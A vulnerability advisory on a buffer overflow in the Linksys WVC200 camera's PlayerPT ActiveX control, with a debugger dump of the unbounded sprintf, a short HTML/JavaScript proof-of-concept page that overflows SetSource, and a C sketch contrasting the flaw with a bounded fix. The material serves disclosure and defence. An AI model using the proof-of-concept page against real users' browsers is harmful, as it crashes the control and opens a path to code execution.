The Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT ActiveX Control (PlayerPT.ocx) suffers from a buffer overflow vulnerability.
When the device web interface is viewed, it asks to install an ActiveX control with the following settings:
ProductName: PlayerPT ActiveX Control Module
File version: 1.0.0.15
Binary path: C:\WINDOWS\system32\PlayerPT.ocx
CLSID: {9E065E4A-BD9D-4547-8F90-985DC62A5591}
ProgID: PLAYERPT.PlayerPTCtrl.1
Safe for scripting (registry): True
Safe for initialization (registry): True
Vulnerability (Only for test):
The SetSource() method is vulnerable to a buffer overflow. Briefly, the OllyDbg dump:
...
03238225  8B5424 20        mov edx,dword ptr ss:[esp+20]
03238229  894424 10        mov dword ptr ss:[esp+10],eax
0323822D  B9 32000000      mov ecx,32
03238232  33C0             xor eax,eax
03238234  8B72 F8          mov esi,dword ptr ds:[edx-8]
03238237  8DBC24 E8020000  lea edi,dword ptr ss:[esp+2E8]
0323823E  F3:AB            rep stos dword ptr es:[edi]
03238240  8B3D 0C062603    mov edi,dword ptr ds:[<&MSVCRT.sprintf>]  ; msvcrt.sprintf
03238246  52               push edx
03238247  8D8C24 EC020000  lea ecx,dword ptr ss:[esp+2EC]
0323824E  68 48612603      push PlayerPT.03266148                    ; ASCII "%s"
03238253  51               push ecx
03238254  FFD7             call edi  <---------------boom
...

rgod

<!-- saved from url=(0014)about:internet -->
<HTML>
<object classid='clsid:9E065E4A-BD9D-4547-8F90-985DC62A5591' id='obj' />
</object>
<script>
var x="";
for (i=0; i<13999; i++){
  x = x + "aaaa";
}
obj.SetSource("","","","",x);
</script>
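The dump shows a stack buffer being zeroed (0x32 dwords) and then filled by sprintf with a bare "%s" and no length limit. The following C sketch is an added example, not code from the advisory or from the vendor: it puts that call shape next to a bounded version that rejects oversized input. The function names are hypothetical, and treating the 200 zeroed bytes as the buffer size is an assumption.

```c
#include <stdio.h>
#include <string.h>

/* 0x32 dwords cleared by "rep stos" in the dump = 200 bytes.
   Treating that as the buffer size is an assumption. */
#define SRC_BUF_LEN (0x32 * 4)

/* Shape of the flawed call: sprintf(buf, "%s", src) with no bound.
   Only safe while strlen(src) < SRC_BUF_LEN. Hypothetical name. */
int copy_source_unbounded(const char *src)
{
    char buf[SRC_BUF_LEN];
    memset(buf, 0, sizeof buf);      /* xor eax,eax / rep stos */
    sprintf(buf, "%s", src);         /* call edi -> msvcrt.sprintf */
    return (int)strlen(buf);
}

/* Hardened form: bound the write and reject input that does not fit
   instead of silently truncating. Returns the length, or -1. */
int copy_source_bounded(const char *src)
{
    char buf[SRC_BUF_LEN];
    int n;

    if (src == NULL)
        return -1;
    memset(buf, 0, sizeof buf);
    n = snprintf(buf, sizeof buf, "%s", src);
    if (n < 0 || (size_t)n >= sizeof buf)
        return -1;                   /* input longer than the buffer */
    return n;
}

int main(void)
{
    char big[1024];                  /* constructed oversized input */
    memset(big, 'a', sizeof big - 1);
    big[sizeof big - 1] = '\0';

    printf("short: %d\n", copy_source_bounded("constructed-short-value"));
    printf("long:  %d\n", copy_source_bounded(big));
    return 0;
}
```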
References: http://www.exploit-db.com/exploits/18641/